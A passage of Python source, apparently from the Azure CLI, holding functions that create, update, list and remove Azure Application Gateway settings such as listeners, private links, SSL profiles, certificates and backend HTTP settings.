ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile) if ssl_profile else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile is not None:
instance.ssl_profile = SubResource(id=ssl_profile)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_indentity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_indentity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
raise CLIError('Frontend IP already reference an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
raise CLIError('Private Link name duplicates')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
raise CLIError('Subnet duplicates')
if subnet.address_prefix == private_link_subnet_prefix:
raise CLIError('Subnet prefix duplicates')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
raise CLIError('Subnet prefix duplicates')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
# the left vnet have to delete manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
